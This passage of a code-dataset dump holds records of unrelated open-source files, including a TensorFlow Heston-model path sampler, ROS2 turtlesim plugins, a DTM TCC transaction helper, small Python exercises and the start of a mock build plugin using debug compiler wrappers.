tolerance)`.\n        Default value: 1e-6.\n      name: Str. The name to give this op.\n        Default value: `sample_paths`.\n\n    Returns:\n      A `Tensor` of shape [num_samples, k, 2] where `k` is the size\n      of the `times`. For each sample and time the first dimension represents\n      the simulated log-state trajectories of the spot price `X(t)`, whereas the\n      second one represents the simulated variance trajectories `V(t)`.\n\n    Raises:\n      ValueError: If `time_step` is not supplied.\n\n    #### References:\n    [1]: Leif Andersen. Efficient Simulation of the Heston Stochastic\n      Volatility Models. 
2006.\n    \"\"\"\n    if random_type is None:\n      random_type = random.RandomType.PSEUDO\n    if time_step is None:\n      raise ValueError('`time_step` can not be `None` when calling '\n                       'sample_paths of HestonModel.')\n    # Note: all the notations below are the same as in [1].\n    name = name or (self._name + '_sample_path')\n    with tf.name_scope(name):\n      time_step = tf.convert_to_tensor(time_step, self._dtype)\n      times = tf.convert_to_tensor(times, self._dtype)\n      current_log_spot = (\n          tf.convert_to_tensor(initial_state[..., 0], dtype=self._dtype)\n          + tf.zeros([num_samples], dtype=self._dtype))\n      current_vol = (\n          tf.convert_to_tensor(initial_state[..., 1], dtype=self._dtype)\n          + tf.zeros([num_samples], dtype=self._dtype))\n      num_requested_times = times.shape[0]\n      times, keep_mask = _prepare_grid(\n          times, time_step, times.dtype,\n          self._kappa, self._theta, self._epsilon, self._rho)\n      return self._sample_paths(\n          times, num_requested_times,\n          current_log_spot, current_vol,\n          num_samples, random_type, keep_mask, seed, skip, tolerance)\n\n  def _sample_paths(self,\n                    times,\n                    num_requested_times,\n                    current_log_spot,\n                    current_vol,\n                    num_samples,\n                    random_type,\n                    keep_mask,\n                    seed,\n                    skip,\n                    tolerance):\n    \"\"\"Returns a sample of paths from the process.\"\"\"\n    # Note: all the notations below are the same as in [1].\n    dt = times[1:] - times[:-1]\n    # Compute the parameters at `times`. Here + tf.reduce_min(dt) / 2 ensures\n    # that the value is constant between `times`.\n    kappa, theta, epsilon, rho = _get_parameters( # pylint: disable=unbalanced-tuple-unpacking\n        times + tf.reduce_min(dt) / 2,\n        self._kappa, self._theta, self._epsilon, self._rho)\n    # For any random_type other than PSEUDO, the sequence of independent random\n    # normals should be generated upfront.\n    if dt.shape.is_fully_defined():\n      steps_num = dt.shape.as_list()[-1]\n    else:\n      steps_num = tf.shape(dt)[-1]\n    # TODO(b/148133811): Re-enable Sobol test when TF 2.2 is released.\n    if random_type == random.RandomType.SOBOL:\n      raise ValueError('Sobol sequence for Euler sampling is temporarily '\n                       'unsupported when `time_step` or `times` have a '\n                       'non-constant value')\n    if random_type != random.RandomType.PSEUDO:\n      # Note that at each iteration we need 2 random draws.\n      normal_draws = utils.generate_mc_normal_draws(\n          num_normal_draws=2, num_time_steps=steps_num,\n          num_sample_paths=num_samples, random_type=random_type,\n          seed=seed,\n          dtype=self.dtype(), skip=skip)\n    else:\n      normal_draws = None\n    cond_fn = lambda i, *args: i < steps_num\n    def body_fn(i, written_count, current_vol, current_log_spot, vol_paths,\n                log_spot_paths):\n      \"\"\"Simulate Heston process to the next time point.\"\"\"\n      time_step = dt[i]\n      if normal_draws is None:\n        normals = random.mv_normal_sample(\n            (num_samples,),\n            mean=tf.zeros([2], dtype=kappa.dtype), seed=seed)\n      else:\n        normals = normal_draws[i]\n      def _next_vol_fn():\n        return _update_variance(\n            kappa[i], theta[i], epsilon[i], rho[i],\n            current_vol, time_step, normals[..., 0])\n      # Do not update variance if `time_step <= tolerance`\n      next_vol = tf.cond(time_step > tolerance,\n                         _next_vol_fn,\n                         lambda: current_vol)\n      def _next_log_spot_fn():\n        return _update_log_spot(\n            kappa[i], theta[i], epsilon[i], rho[i],\n            current_vol, next_vol, current_log_spot, time_step,\n            normals[..., 1])\n      # Do not update state if `time_step <= tolerance`\n      next_log_spot = tf.cond(time_step > tolerance,\n                              _next_log_spot_fn,\n                              lambda: current_log_spot)\n      # Update volatility paths\n      vol_paths = utils.maybe_update_along_axis(\n          tensor=vol_paths,\n          
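# keep_mask marks the grid points that correspond to user-requested output\n          # times; intermediate QE steps are simulated but not stored.\n          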
do_update=keep_mask[i + 1],\n ind=written_count,\n axis=1,\n new_tensor=tf.expand_dims(next_vol, axis=1))\n # Update log-spot paths\n log_spot_paths = utils.maybe_update_along_axis(\n tensor=log_spot_paths,\n do_update=keep_mask[i + 1],\n ind=written_count,\n axis=1,\n new_tensor=tf.expand_dims(next_log_spot, axis=1))\n written_count += tf.cast(keep_mask[i + 1], dtype=tf.int32)\n return (i + 1, written_count,\n next_vol, next_log_spot, vol_paths, log_spot_paths)\n\n shape = (num_samples, num_requested_times)\n log_spot_paths = tf.zeros(shape, dtype=self._dtype)\n vol_paths = tf.zeros(shape, dtype=self._dtype)\n _, _, _, _, vol_paths, log_spot_paths = tf.while_loop(\n cond_fn, body_fn, (0, 0, current_vol, current_log_spot,\n vol_paths, log_spot_paths),\n maximum_iterations=steps_num)\n return tf.stack([log_spot_paths, vol_paths], -1)\n\n\ndef _get_parameters(times, *params):\n \"\"\"Gets parameter values at the specified `times`.\"\"\"\n result = []\n for param in params:\n if isinstance(param, piecewise.PiecewiseConstantFunc):\n result.append(param(times))\n else:\n result.append(param * tf.ones_like(times))\n return result\n\n\ndef _update_variance(\n kappa, theta, epsilon, rho,\n current_vol, time_step, normals, psi_c=1.5):\n \"\"\"Updates variance value.\"\"\"\n del rho\n psi_c = tf.convert_to_tensor(psi_c, dtype=kappa.dtype)\n scaled_time = tf.exp(-kappa * time_step)\n epsilon_squared = epsilon**2\n m = theta + (current_vol - theta) * scaled_time\n s_squared = (\n current_vol * epsilon_squared * scaled_time / kappa\n * (1 - scaled_time) + theta * epsilon_squared / 2 / kappa\n * (1 - scaled_time)**2)\n psi = s_squared / m**2\n uniforms = 0.5 * (1 + tf.math.erf(normals / _SQRT_2))\n cond = psi < psi_c\n # Result where `cond` is true: quadratic sampling scheme\n psi_inv = 2 / psi\n b_squared = psi_inv - 1 + tf.sqrt(psi_inv * (psi_inv - 1))\n\n a = m / (1 + b_squared)\n next_var_true = a * (tf.sqrt(b_squared) + tf.squeeze(normals))**2\n # Result where `cond` is false: exponential sampling scheme\n p = (psi - 1) / (psi + 1)\n beta = (1 - p) / m\n next_var_false = tf.where(uniforms > p,\n tf.math.log(1 - p) - tf.math.log(1 - uniforms),\n tf.zeros_like(uniforms)) / beta\n next_var = tf.where(cond, next_var_true, next_var_false)\n return next_var\n\n\ndef _update_log_spot(\n kappa, theta, epsilon, rho,\n current_vol, next_vol, current_log_spot, time_step, normals,\n gamma_1=0.5, gamma_2=0.5):\n \"\"\"Updates log-spot value.\"\"\"\n k_0 = - rho * kappa * theta / epsilon * time_step\n k_1 = (gamma_1 * time_step\n * (kappa * rho / epsilon - 0.5)\n - rho / epsilon)\n k_2 = (gamma_2 * time_step\n * (kappa * rho / epsilon - 0.5)\n + rho / epsilon)\n k_3 = gamma_1 * time_step * (1 - rho**2)\n k_4 = gamma_2 * time_step * (1 - rho**2)\n\n next_log_spot = (\n current_log_spot + k_0 + k_1 * current_vol + k_2 * next_vol\n + tf.sqrt(k_3 * current_vol + k_4 * next_vol) * normals)\n return next_log_spot\n\n\ndef _prepare_grid(times, time_step, dtype, *params):\n \"\"\"Prepares grid of times for path generation.\n\n Args:\n times: Rank 1 `Tensor` of increasing positive real values. The times at\n which the path points are to be evaluated.\n time_step: Rank 0 real `Tensor`. Maximal distance between points in the\n resulting grid.\n dtype: `tf.Dtype` of the input and output `Tensor`s.\n *params: Parameters of the Heston model. 
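The `_update_variance` helper above implements Andersen's QE discretization: when the ratio `psi = s^2 / m^2` is below the switching threshold `psi_c` (1.5 by default) the next variance is drawn from a squared-Gaussian (quadratic) scheme, otherwise from an exponential-tail scheme. Below is a minimal NumPy sketch of that switching rule; the parameter values are chosen purely for illustration and the function name is my own, not part of the library.

```python
import numpy as np

def qe_variance_step(v, kappa, theta, epsilon, dt, rng):
    """One QE update of the Heston variance, following Andersen's scheme."""
    e = np.exp(-kappa * dt)
    m = theta + (v - theta) * e                              # conditional mean
    s2 = (v * epsilon**2 * e / kappa * (1 - e)
          + theta * epsilon**2 / (2 * kappa) * (1 - e)**2)   # conditional variance
    psi = s2 / m**2
    if psi < 1.5:                                            # quadratic scheme
        psi_inv = 2.0 / psi
        b2 = psi_inv - 1 + np.sqrt(psi_inv * (psi_inv - 1))
        a = m / (1 + b2)
        z = rng.standard_normal()
        return a * (np.sqrt(b2) + z)**2
    # exponential scheme: mass at zero plus an exponential tail
    p = (psi - 1) / (psi + 1)
    beta = (1 - p) / m
    u = rng.uniform()
    return 0.0 if u <= p else np.log((1 - p) / (1 - u)) / beta

rng = np.random.default_rng(42)
v = 0.04
for _ in range(10):  # ten steps of dt = 0.1 with illustrative parameters
    v = qe_variance_step(v, kappa=1.3, theta=0.05, epsilon=0.5, dt=0.1, rng=rng)
print(v)
```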
Either scalar `Tensor`s of the\n same `dtype` or instances of `PiecewiseConstantFunc`.\n\n Returns:\n Tuple `(all_times, mask)`.\n `all_times` is a 1-D real `Tensor` containing all points from `times`, the\n uniform grid of points between `[0, times[-1]]` with grid size equal to\n `time_step`, and jump locations of piecewise constant parameters. The\n `Tensor` is sorted in ascending order and may contain duplicates.\n `mask` is a boolean 1-D `Tensor` of the same shape as `all_times`, showing\n which elements of `all_times` correspond to the values from `times`.\n Guarantees that times[0]=0 and mask[0]=False.\n \"\"\"\n grid = tf.range(0.0, times[-1], time_step, dtype=dtype)\n additional_times = []\n for param in params:\n if isinstance(param, piecewise.PiecewiseConstantFunc):\n additional_times.append(param.jump_locations())\n all_times = tf.concat([grid, times] + additional_times, axis=0)\n additional_times_mask = [\n tf.zeros_like(times, dtype=tf.bool) for times in additional_times]\n mask = tf.concat([\n tf.zeros_like(grid, dtype=tf.bool),\n tf.ones_like(times, dtype=tf.bool)\n ] + additional_times_mask, axis=0)\n perm = tf.argsort(all_times, stable=True)\n all_times = tf.gather(all_times, perm)\n mask = tf.gather(mask, perm)\n return all_times, mask\n","repo_name":"WorldCapital/tf-quant-finance","sub_path":"tf_quant_finance/models/heston/heston_model.py","file_name":"heston_model.py","file_ext":"py","file_size_in_byte":18130,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
{"seq_id":"73771068007","text":"import random\r\nfrom Bomb import *\r\nclass House(object):\r\n\r\n    def __init__(self):\r\n        \"\"\"creates a house in a random location\"\"\"\r\n        self.x = random.randint(0, 590)\r\n        self.y = random.randint(0, 590)\r\n        self.size = 10\r\n        self.home = Rectangle(Point(self.x, self.y),\r\n                              Point(self.x + self.size, self.y + self.size))\r\n        self.home.setFill(\"Black\")\r\n\r\n    def drawHouse(self, win:GraphWin):\r\n        self.home.draw(win)\r\n\r\n    def getDistance(self, bombCenter:Point):\r\n        houseCenter = self.home.getCenter()\r\n        dx = (houseCenter.getX() - bombCenter.getX())**2\r\n        dy = (houseCenter.getY() - bombCenter.getY())**2\r\n        return (dx + dy)**0.5\r\n\r\n    def isHit(self, bomb:Bomb):\r\n        if self.getDistance(bomb.center) < bomb.radius:\r\n            self.home.setFill(\"red\")\r\n\r\n","repo_name":"PSHS-Programming1/Period4GitTest","sub_path":"House.py","file_name":"House.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"15037297759","text":"from django.urls import path\nfrom . 
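`_prepare_grid` above merges the uniform simulation grid, the user-requested `times`, and any parameter jump locations into one sorted vector, together with a boolean mask marking which entries came from `times`. A small standalone check of the same argsort-and-mask idea (the values here are arbitrary):

```python
import tensorflow as tf

grid = tf.constant([0.0, 0.25, 0.5, 0.75])       # uniform simulation grid
times = tf.constant([0.3, 0.75])                 # user-requested output times
all_times = tf.concat([grid, times], axis=0)
mask = tf.concat([tf.zeros_like(grid, dtype=tf.bool),
                  tf.ones_like(times, dtype=tf.bool)], axis=0)
perm = tf.argsort(all_times, stable=True)        # stable sort keeps grid entries first on ties
all_times = tf.gather(all_times, perm)
mask = tf.gather(mask, perm)
print(all_times.numpy())                         # [0.   0.25 0.3  0.5  0.75 0.75]
print(tf.boolean_mask(all_times, mask).numpy())  # [0.3  0.75] -- the requested times
```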
import views\n\nurlpatterns = [\n    # Other URL patterns...\n    path('register/', views.register, name='register'),\n    path('login/', views.login_user, name='login'),\n    path('logout/', views.logout_user, name='logout'),\n    # You can add more URLs as needed\n]\n","repo_name":"wcantu/DevWebsiteDjango","sub_path":"PlaynTrade/loginpage/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"37067397077","text":"# Up, Down, Left, Right (grid-walk problem)\n\nN = int(input())\nlst = list(map(str, input().split()))\n\nstart = [1,1]\n\nfor i in range(len(lst)):\n    if lst[i] == 'L' :\n        if start[1] -1 == 0:\n            continue\n        start[1] -= 1\n    elif lst[i] == 'R' :\n        if start[1] +1 > N:\n            continue\n        start[1] += 1\n    elif lst[i] == 'U' :\n        if start[0] -1 == 0:\n            continue\n        start[0] -= 1\n    elif lst[i] == 'D' :\n        if start[0] + 1 > N:\n            continue\n        start[0] += 1\n    else:\n        continue\n\nprint(start)","repo_name":"junh0328/prepare_algorithm","sub_path":"implementation/implementation01-1.py","file_name":"implementation01-1.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"5163585505","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# @Author : Stone\n# Date : 2022/3/31\nimport inspect\n\nfrom .imp.const import OpCancel, OpConfirm, OpTry\nfrom .imp.trans_base import TransBase, trans_register_branch, trans_request_branch, trans_call_dtm\n\n\ndef tcc_global_transaction(dtm: str, gid: str, tcc_func):\n    return tcc_global_transaction2(dtm, gid, my_custom, tcc_func)\n\n\nasync def tcc_global_transaction2(dtm: str, gid: str, custom, tcc_func):\n    tcc = Tcc(gid=gid, trans_type=\"tcc\", dtm=dtm, branch_id=\"\")\n    try:\n        _ = await custom(tcc) if inspect.iscoroutinefunction(custom) else custom(tcc)\n        res = await trans_call_dtm(tcc, tcc, \"prepare\")\n        if res:\n            return res\n\n        resp, err = await tcc_func(tcc) if inspect.iscoroutinefunction(tcc_func) else tcc_func(tcc)\n        _ = await trans_call_dtm(tcc, tcc, \"abort\") if err else await trans_call_dtm(tcc, tcc, \"submit\")\n\n    except Exception as e:\n        await trans_call_dtm(tcc, tcc, \"abort\")\n        raise e\n    return\n\n\nclass Tcc(TransBase):\n\n    def __init__(self,**kwargs):\n        \"\"\"Initialize a TCC transaction.\"\"\"\n        kwargs.update(trans_type=\"tcc\")\n        super(Tcc, self).__init__(**kwargs)\n\n    async def call_branch(self, body: dict, try_url: str, confirm_url: str, cancel_url: str):\n        branch_id = self.new_sub_branch_id()\n        added = {\n            \"data\": body,\n            \"branch_id\": branch_id,\n            OpConfirm: confirm_url,\n            OpCancel: cancel_url,\n        }\n        error = await trans_register_branch(self, added, operation=\"registerBranch\")\n        if error:\n            return None, error\n        return await trans_request_branch(self, \"POST\", body, branch_id, OpTry, try_url)\n\n\nasync def my_custom(t: Tcc):\n    ...\n","repo_name":"tufbel/PythonTools","sub_path":"src/my_tools/dtm_tools/tcc.py","file_name":"tcc.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"15038596959","text":"#!/usr/bin/python3\n\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without 
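The movement simulation above (a classic "up-down-left-right" grid-walk exercise) can also be written with a direction table instead of one branch per command. A compact sketch that stays on an N x N board with 1-based coordinates; the plan list is a made-up example:

```python
N = 5
plans = ['R', 'R', 'R', 'U', 'D', 'D']           # sample move plan
moves = {'L': (0, -1), 'R': (0, 1), 'U': (-1, 0), 'D': (1, 0)}

r, c = 1, 1
for p in plans:
    dr, dc = moves.get(p, (0, 0))
    nr, nc = r + dr, c + dc
    if 1 <= nr <= N and 1 <= nc <= N:            # ignore moves that leave the board
        r, c = nr, nc
print(r, c)                                      # 3 4
```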
even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\n# The GPL3 license is a widely used free software license that allows \n# users to run, study, share, and modify software. It requires that \n# any derivative works or modifications made to the software be \n# licensed under the GPL3 and that the source code be made available \n# to anyone who receives the software.\n\n\n# other libraries\nimport os\nimport random\nimport abc\nfrom typing import Dict\nimport pygame\n\n# package module\nfrom turtlesim_plus.entity import (\n Entity, Pizza, Turtle, \n TurtleCommandInterface,TurtleScannerInterface,TurtleEatInterface, \n Simulator\n)\n\n# RCLPY libraries, classes, functions\nfrom rclpy.node import Node\nfrom rclpy.action import ActionServer\nfrom rclpy.action.server import ServerGoalHandle\n\n# ROS Packages\nfrom std_msgs.msg import Int64\nfrom std_srvs.srv import Empty\nfrom turtlesim.msg import Pose\nfrom turtlesim.srv import Spawn, Kill\nfrom geometry_msgs.msg import Twist, Point\nfrom turtlesim_plus_interfaces.msg import ScannerData, ScannerDataArray\nfrom turtlesim_plus_interfaces.srv import GivePosition\nfrom turtlesim_plus_interfaces.action import GetData\n\nclass ROS2Plugin(abc.ABC):\n def __init__(self,node:Node):\n self.node = node\nclass MouseROS2Plugin(ROS2Plugin):\n def __init__(self,node:Node):\n super().__init__(node=node)\n self.mouse_pub = self.node.create_publisher(Point,'mouse_position',10)\n self.node.simulator.mouse_callback = self.mouse_callback\n def mouse_callback(self,pos):\n msg = Point()\n msg.x = pos[0]*5.44/250\n msg.y = 10.88-pos[1]*5.44/250\n self.mouse_pub.publish(msg)\nclass TurtleCommandROS2Plugin(TurtleCommandInterface,ROS2Plugin):\n def __init__(self, turtle: Turtle,node: Node,image):\n TurtleCommandInterface.__init__(self,turtle=turtle)\n ROS2Plugin.__init__(self,node=node)\n self.cmd_vel_pub = self.node.create_publisher(Pose,self.turtle.name+'/pose',10)\n self.sub = self.node.create_subscription(Twist,self.turtle.name+'/cmd_vel',self.cmd_vel_sub_callback,10)\n self.stop_service = self.node.create_service(Empty,self.turtle.name+'/stop',self.stop_srv_callback)\n self.image = image\n def cmd_vel_sub_callback(self,msg:Twist):\n self.command_velocity = [msg.linear.x,msg.angular.z]\n def stop_srv_callback(self,request:Empty.Request,response:Empty.Response):\n self.command_velocity = [0.0,0.0]\n return response\n def update(self, dt: float = 0.1, *args, **kwargs):\n TurtleCommandInterface.update(self, dt, *args, **kwargs)\n self.set_state(self.turtle.state)\n self.set_pose(self.turtle.state)\n msg = Pose()\n msg.x = self.state[0]\n msg.y = self.state[1]\n msg.theta = self.state[2]\n #qw = np.cos(yaw/2) \n #qz = np.sin(yaw/2) \n self.cmd_vel_pub.publish(msg=msg)\n def __del__(self):\n self.node.destroy_publisher(publisher=self.cmd_vel_pub)\n self.node.destroy_subscription(subscription=self.sub)\n self.node.destroy_service(service=self.stop_service)\nclass TurtleScannerROS2Plugin(TurtleScannerInterface,ROS2Plugin):\n def __init__(self, turtle:Turtle,node:Node):\n TurtleScannerInterface.__init__(self,turtle=turtle)\n ROS2Plugin.__init__(self,node=node)\n self.scanner_pub = self.node.create_publisher(ScannerDataArray,self.turtle.name+'/scan',10)\n self.action_server = ActionServer(self.node,GetData,self.turtle.name+'/detect_pizza',self.execute_callback)\n def 
execute_callback(self,goal_handle:ServerGoalHandle):\n result = GetData.Result()\n if len(self.scanner_output)>0:\n result.is_data = True\n msg = ScannerDataArray()\n for data in self.scanner_output:\n scanner_data = ScannerData()\n if str(data.type.__name__)=='Pizza':\n scanner_data.type = 'Pizza'\n scanner_data.angle = data.angle\n scanner_data.distance = data.distance\n msg.data.append(scanner_data)\n result.data = msg\n goal_handle.succeed()\n else:\n result.is_data = False\n goal_handle.abort()\n return result\n def update(self, dt: float = 0.1, entity_list:Dict[str,Entity] = {}, *args, **kwargs):\n TurtleScannerInterface.update(self,dt=dt,entity_list=entity_list)\n self.set_state(self.turtle.state)\n if len(self.scanner_output)>0:\n msg = ScannerDataArray()\n for data in self.scanner_output:\n scanner_data = ScannerData()\n if str(data.type.__name__).startswith('Turtle'):\n scanner_data.type = 'Turtle'\n else:\n scanner_data.type = data.type.__name__\n scanner_data.angle = data.angle\n scanner_data.distance = data.distance\n msg.data.append(scanner_data)\n self.scanner_pub.publish(msg)\n def __del__(self):\n self.node.destroy_publisher(publisher=self.scanner_pub)\nclass TurtleEatROS2Plugin(TurtleEatInterface,ROS2Plugin):\n def __init__(self, turtle:Turtle,node:Node):\n TurtleEatInterface.__init__(self,turtle=turtle)\n ROS2Plugin.__init__(self,node=node)\n self.pizza_count = 0\n self.pizza_count_publisher = self.node.create_publisher(Int64,self.turtle.name+'/pizza_count',10)\n self.eat_service = self.node.create_service(Empty,self.turtle.name+'/eat',self.eat_srv_callback)\n def eat_srv_callback(self,request:Empty.Request,response:Empty.Response):\n if len(self.edibles)>0:\n self.pizza_count+=1\n edible = self.edibles.pop(0)\n del self.node.simulator.entity_list[edible.name]\n del self.node.simulator.gui.entity_list[edible.name]\n return response\n def update(self, dt: float = 0.1, entity_list:Dict[str,Entity] = {}, *args, **kwargs):\n TurtleEatInterface.update(self,dt=dt,entity_list=entity_list)\n self.set_state(self.turtle.state)\n msg = Int64()\n msg.data = self.pizza_count\n self.pizza_count_publisher.publish(msg)\n def __del__(self):\n self.node.destroy_publisher(publisher=self.pizza_count_publisher)\n self.node.destroy_service(service=self.eat_service)\n\nclass TurtleCommandScannerEatROS2Plugin(TurtleScannerROS2Plugin,TurtleCommandROS2Plugin,TurtleEatROS2Plugin):\n def __init__(self, turtle: Turtle, node: Node, image):\n TurtleCommandROS2Plugin.__init__(self,turtle=turtle, node=node, image=image)\n TurtleScannerROS2Plugin.__init__(self,turtle=turtle,node=node)\n TurtleEatROS2Plugin.__init__(self,turtle=turtle,node=node)\n def update(self, dt: float = 0.1, entity_list: Dict[str,Entity] = {}, *args, **kwargs):\n TurtleCommandROS2Plugin.update(self,dt=dt)\n TurtleScannerROS2Plugin.update(self,dt=dt,entity_list=entity_list)\n TurtleEatROS2Plugin.update(self,dt=dt,entity_list=entity_list)\n def render(self, screen):\n TurtleScannerROS2Plugin.render(self,screen=screen)\n TurtleEatROS2Plugin.render(self,screen=screen)\n TurtleCommandROS2Plugin.render(self,screen=screen)\n def __del__(self):\n TurtleEatROS2Plugin.__del__(self)\n TurtleScannerROS2Plugin.__del__(self)\n TurtleCommandROS2Plugin.__del__(self)\nclass TurtlesimPlusNode(Node):\n def __init__(self):\n super().__init__(node_name='turtlesim_plus')\n time_step = 0.01 \n self.simulator = Simulator(time_step=time_step)\n self.mouse_plugin = MouseROS2Plugin(self)\n self.create_timer(time_step,self.timer_callback)\n 
self.spawn_turtle_service = self.create_service(Spawn,'spawn_turtle',self.spawn_turtle_srv_callback)\n self.remove_turtle_service = self.create_service(Kill,'remove_turtle',self.remove_turtle_srv_callback)\n self.spawn_pizza_service = self.create_service(GivePosition,'spawn_pizza',self.spawn_pizza_srv_callback)\n prompt = \"\"\"\n \n Welcome to Turtlesim+!!\n\n You can call the following services to interact with 'the simulator':\n /spawn_turtle,/remove_turtle,/spawn_pizza\n\n \"Once you spawn at least 1 turtle, you can read from the following topics:\n /[name]/pose,/[name]/scan,/[name]/pizza_count\n\n You can also publish to '/[name]/cmd_vel'.\n\n You can also call the following turtle's services.\n /[name]/eat,/[name]/stop\n\n \"\"\"\n self.get_logger().info(prompt)\n \n request = Spawn.Request()\n request.name = 'turtle1'\n response = Spawn.Response()\n self.spawn_turtle_srv_callback(request,response)\n \n \n def spawn_turtle_srv_callback(self,request:Spawn.Request,response:Spawn.Response):\n flag = False\n init_pose = [5.44,5.44,0.0]\n if not request.name:\n name = 'turtle1'\n flag = True\n else:\n name = request.name\n idx = 0\n while name in self.simulator.entity_list.keys():\n idx += 1\n name = 'turtle'+str(idx)\n if flag:\n self.get_logger().info(f'Name is not given. Use {name} instead.')\n if idx >0:\n self.get_logger().info(f'The name {request.name} already exists in Turtlesim Plus. Use {name} instead.')\n if request.x:\n x = request.x\n else:\n x = init_pose[0]\n if request.y:\n y = request.y\n else:\n y = init_pose[1]\n if request.theta:\n theta = request.theta\n else:\n theta = init_pose[2]\n \n image = random.choice(self.simulator.gui.available_images)\n self.simulator.gui.available_images.remove(image) \n turtle = Turtle(name=name,init_pose=[x,y,theta])\n # load graphics when added\n graphics = pygame.image.load(os.path.join(self.simulator.gui.image_dir,'turtle',image)).convert_alpha()\n turtle.set_graphics(graphics=graphics)\n ros2_turtle = TurtleCommandScannerEatROS2Plugin(turtle=turtle,node=self,image=image)\n self.simulator.add_entity(entity=ros2_turtle)\n response.name = name\n return response\n def remove_turtle_srv_callback(self,request:Kill.Request,response:Kill.Response):\n if not request.name:\n self.get_logger().warning('No name is given. 
No turtle is removed.')\n        else:\n            if request.name in self.simulator.entity_list.keys():\n                entity = self.simulator.entity_list[request.name]\n                if isinstance(entity,TurtleCommandScannerEatROS2Plugin):\n                    self.simulator.remove_entity(entity=entity)\n                    self.simulator.engine.remove_entity(entity=entity)\n                    self.simulator.gui.available_images.append(entity.image)\n                    entity.__del__()\n                    self.get_logger().warning(f'Successfully removed {request.name}')\n            else:\n                self.get_logger().warning(f'No turtle with the name {request.name}')\n        return response\n    def spawn_pizza_srv_callback(self,request:GivePosition.Request,response:GivePosition.Response):\n        idx = 0\n        name = 'pizza'+str(idx)\n        while name in self.simulator.entity_list.keys():\n            idx += 1\n            name = 'pizza'+str(idx)\n        if not request.x:\n            x = random.uniform(0,10.88)\n        else:\n            x = request.x\n        if not request.y:\n            y = random.uniform(0,10.88)\n        else:\n            y = request.y\n        # load graphics when added\n        graphics = pygame.image.load(os.path.join(self.simulator.gui.image_dir,'object','pizza.png')).convert_alpha()\n        pizza = Pizza(name=name,pose=[x,y,0.0])\n        pizza.set_graphics(graphics=graphics)\n        self.simulator.add_entity(entity=pizza)\n        return response\n    \n    def timer_callback(self):\n        self.simulator.step()\n","repo_name":"tchoopojcharoen/turtlesim_plus","sub_path":"turtlesim_plus/turtlesim_plus/ros2_plugins.py","file_name":"ros2_plugins.py","file_ext":"py","file_size_in_byte":12584,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"}
{"seq_id":"71191401127","text":"import numpy as np\n\nrandom_list = np.random.uniform(-1000, 1000, 100)\n\n# Track the two smallest and the two largest values seen so far.\nMenores = [float('inf'), float('inf')]\nMayores = [float('-inf'), float('-inf')]\n\nfor x in random_list:\n    if(x < Menores[0]):\n        Menores[1] = Menores[0]\n        Menores[0] = x\n    elif(x < Menores[1]):\n        Menores[1] = x\n    if(x > Mayores[0]):\n        Mayores[1] = Mayores[0]\n        Mayores[0] = x\n    elif(x > Mayores[1]):\n        Mayores[1] = x\n\nprint(\"\\nThe two smallest: \" + str(Menores) + \"\\nThe two largest: \" + str(Mayores))","repo_name":"MarcoOrtegaF/Genetic","sub_path":"P1.py","file_name":"P1.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"24165766958","text":"from turtle import Turtle\nimport random\n\n\nclass Food(Turtle):\n\n    def __init__(self):\n        super().__init__()\n        self.shape(\"turtle\")\n        self.penup()\n        self.shapesize(stretch_len=0.5, stretch_wid=0.6)\n        self.color(\"green\")\n        self.speed(\"fastest\")\n        self.refresh()\n\n    def refresh(self):\n        random_x = random.randint(-260, 260)\n        random_y = random.randint(-260, 260)\n        self.goto(random_x, random_y)\n\n\n# shapesize() sets the stretch factors of the turtle's shape.\n# distance() returns the distance from the turtle to a given position or turtle.\n","repo_name":"SureshRajJoshi/snake-game","sub_path":"food.py","file_name":"food.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"13541999279","text":"from mockbuild.trace_decorator import decorate, traceLog, getLog\n\nimport mockbuild.util\nimport shutil\nimport os\nimport os.path\nimport glob\n\nrequires_api_version = \"1.0\"\n\n# plugin entry point\ndecorate(traceLog())\ndef init(root, opts):\n    O0g3(root, opts)\n\nclass O0g3(object):\n    \"\"\"Build packages with -O0 -g3 by swapping in wrapper compilers inside the chroot\"\"\"\n\n\n    decorate(traceLog())\n    def __init__(self, root, opts):\n        self.root = root\n        self.opts = opts\n        self.O0g3s = {\n            \"gcc\": \"/usr/share/mock-O0g3-plugin/gcc-O0g3\",\n            \"cc\": \"/usr/share/mock-O0g3-plugin/cc-O0g3\",\n            \"g++\": 
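On the client side, the topics that `TurtleCommandROS2Plugin` wires up can be driven from a plain `rclpy` node. A minimal sketch follows; the topic name assumes the default `turtle1` that the simulator node spawns at startup:

```python
import rclpy
from rclpy.node import Node
from geometry_msgs.msg import Twist

class Driver(Node):
    def __init__(self):
        super().__init__('turtle_driver')
        self.pub = self.create_publisher(Twist, '/turtle1/cmd_vel', 10)
        self.timer = self.create_timer(0.1, self.tick)  # publish at 10 Hz

    def tick(self):
        msg = Twist()
        msg.linear.x = 1.0   # forward speed, read by cmd_vel_sub_callback above
        msg.angular.z = 0.5  # turning rate
        self.pub.publish(msg)

def main():
    rclpy.init()
    node = Driver()
    try:
        rclpy.spin(node)
    finally:
        node.destroy_node()
        rclpy.shutdown()

if __name__ == '__main__':
    main()
```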
